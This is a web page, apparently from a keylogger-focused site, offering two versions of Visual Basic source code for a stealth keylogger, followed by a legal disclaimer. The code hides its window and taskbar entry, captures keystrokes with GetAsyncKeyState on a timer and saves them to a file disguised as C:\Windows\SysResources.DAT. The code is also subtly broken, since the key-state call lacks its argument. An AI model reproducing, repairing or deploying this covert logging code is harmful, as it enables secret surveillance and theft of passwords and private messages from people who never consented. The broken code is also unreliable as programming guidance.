Keylogger.Org is a website for people interested in monitoring software, hardware keyloggers and applications. Its domain name appeared at times when the monitoring software and was called ‘keyloggers’, had only the function of keystrokes interception and in most cases was considered to be malicious.
Show More
Declare Function GetAsyncKeyState Lib "user32" Alias "GetAsyncKeyState"
(ByVal vKey As Long) As Integer
app.taskvisible = false
form1.visible = false
form1.hide
timer1.enabled = true
'and also in the properties section of the form...change the shownintaskbar to false
Dim strLetter as String, strTotal as String
Private Sub Timer1_Timer()
For I = 28 To 128
If GetAsyncKeyState <> 0 Then
strLetter = Chr(I)
'Now here you can add certain things
'so that instead of displaying
'retarded characters, it tells you
'what the user pressed. What I mean
'is if they press Enter/Return, it will
'Show some weird box. You dont want that
'so u make a select case about I for each
'button u want to customize. PM me or Email
'me for help on this part.
strTotal = strTotal & strLetter
End If
Next I
open "C:\Windows\SysResources.DAT" for output as #1
Print #1, strTotal
close #1
End Sub
'End Code
'BEGINNING
Dim strLetter As String, strTotal As String, old as string
Private Sub Command1_Click()
Timer1.Enabled = True
End Sub
Private Sub Form_Load()
Command1.Caption = "Start Loggin"
Timer1.Enabled = False
Timer1.Interval = 1
End Sub
Private Sub Timer1_Timer()
For I = 28 To 128 'ASCII code
If GetAsyncKeyState <> 0 Then
strLetter = Chr(I)
End If
If strletter <> Old Then
Old = strletter
strTotal = strTotal & old
End If
Next I
Open "C:\windows\SysResources.dat" For Output As #1
Print #1, strTotal
Close #1
End Sub
'ENDING
Installing computer monitoring tools on computers you do not own or do not have permission to monitor may violate local, state or federal law.
Logging other people's keystrokes or breaking into other people's computer without their permission can be considered illegal by the courts of many countries. The monitoring software reviewed here is ONLY for authorized system administrators and/or owners of computers. We assume no liability and are not responsible for any misuse or damage caused by the keylogging software. The end user of this software is obliged to obey all applicable local, state, federal and other laws in his country of residence.